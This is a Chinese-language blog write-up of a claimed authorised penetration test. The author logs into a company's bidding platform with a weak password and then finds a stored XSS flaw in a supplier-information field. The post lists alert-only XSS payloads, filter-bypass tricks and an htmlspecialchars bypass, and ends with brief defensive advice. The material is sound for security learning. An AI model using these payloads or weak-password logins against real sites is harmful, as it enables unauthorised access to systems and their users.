轉(zhuǎn)自我的奇安信攻防社區(qū)文章:https://forum.butian.net/share/885

免責(zé)聲明:

滲透過程為授權(quán)測(cè)試,所有漏洞均以提交相關(guān)平臺(tái),博客目的只為分享挖掘思路和知識(shí)傳播**

涉及知識(shí):

xss注入及xss注入繞過

挖掘過程:

某次針對(duì)某目標(biāo)信息搜集無意發(fā)現(xiàn)某工程公司的項(xiàng)目招標(biāo)平臺(tái)

厚碼…求生欲滿滿嗚嗚嗚

隨手一試就是弱口令登陸, 弱口令yyds!!!

發(fā)現(xiàn)在供應(yīng)商資料中存在不少輸入點(diǎn),手癢隨手一波xss

分享一波常用測(cè)試語句:

<script>alert('XSS')</script> <scr<script>ipt>alert('XSS')</scr<script>ipt> "><script>alert("XSS")</script> "><script>alert(String.fromCharCode(88,83,83))</script> <img src=x onerror=alert('XSS');> <img src=x onerror=alert('XSS')// <img src=x onerror=alert(String.fromCharCode(88,83,83));> <img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> <img src=x:alert(alt) onerror=eval(src) alt=xss> "><img src=x οnerrοr=alert("XSS");> "><img src=x onerror=alert(String.fromCharCode(88,83,83));>

刷一波發(fā)現(xiàn)大部分都有過濾,但是[股份/責(zé)任人] 欄下有代碼被注入成功

語句為:"<script>alert('XSS')</script>"<

查看該部分DOM源碼:
有戲!

針對(duì)該點(diǎn)繼續(xù)測(cè)試,構(gòu)造語句:

"<script>alert('XSS')</script>"<

“"<

“"<

url編碼:
"<script>alert("''XSS'")%3C/script%3E

小總結(jié):

發(fā)現(xiàn) / 被轉(zhuǎn)義成 =”” //
/變成 =””
</ script>轉(zhuǎn)義成<="" script=""> 而且多個(gè)/
,如///也只被轉(zhuǎn)義成 ="" 沒辦法重寫繞過

并且存在htmlspecialchars()函數(shù): &quot,意味: """

本地測(cè)試發(fā)現(xiàn)script便簽中存在 &quot 就無法彈窗
所以存在兩個(gè)問題,一方面要繞過這個(gè)&quot,而且要繞過</script>的轉(zhuǎn)義

• L先說對(duì)</script>的繞過思路:
  轉(zhuǎn)換法:

前端限制繞過，直接抓包重放，或者修改html前端代碼

大小寫，比如：<scrIPT>alERT(1111)</scRIPT>用來繞過

拼湊：<scri<script>pt>alert(1111)</scri</script>pt>

使用注釋干擾：
<scri<!--test-->pt>alert(111)</scri<!--test-->pt>

編碼法:
核心思路：后臺(tái)過濾了特殊字符，比如<script>標(biāo)簽，但該標(biāo)簽可以被各種編碼，后臺(tái)不一定過濾，當(dāng)瀏覽器對(duì)該編碼進(jìn)行識(shí)別時(shí)，會(huì)翻譯成正常的便簽，從而執(zhí)行
在使用編碼時(shí)需要主要編碼在輸出點(diǎn)是否會(huì)被正常是不和翻譯！

• 接下來說對(duì)&quot的繞過:

htmlspecialchars()函數(shù)是把預(yù)定義的字符轉(zhuǎn)換為HTML實(shí)體，預(yù)定義的字符是：&（和號(hào)）成為 &amp " (雙引號(hào)）成為&quot ‘（單引號(hào)）成為&#039 <(小于號(hào)）成為&lt >(大于號(hào)） 成為&gt 可引用類型: ENT_COMPAT-默認(rèn)，僅編碼雙引號(hào) ENT_QUOMES-編碼雙引號(hào)和單引號(hào) ENT_NOQUOTES-不編碼任何引號(hào) eg:q'οnclick='alert(1111)'

其他函數(shù)

構(gòu)造語句:

構(gòu)造對(duì)&quot的繞過:

q'οnclick='alert(1111)'

直接產(chǎn)生彈窗:

重新訪問頁面該xss彈窗還在,說明注入成功

xss常見的防范措施

總的原則：輸入做過濾，輸出做轉(zhuǎn)義
過濾：根據(jù)業(yè)務(wù)需求進(jìn)行過濾，比如過濾要求輸入手機(jī)號(hào)，則只允許輸入手機(jī)號(hào)格式的數(shù)字
轉(zhuǎn)義：所有輸入到前端的數(shù)據(jù)都根據(jù)輸出點(diǎn)進(jìn)行轉(zhuǎn)義，比如輸出到HTML中進(jìn)行HTML實(shí)體轉(zhuǎn)義，輸入到JS里面的進(jìn)行JS轉(zhuǎn)義

看完點(diǎn)贊關(guān)注不迷路!!! 后續(xù)繼續(xù)更新優(yōu)質(zhì)安全內(nèi)容!!!

總結(jié)

以上是生活随笔為你收集整理的对某公司一次弱口令到存储型xss挖掘的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。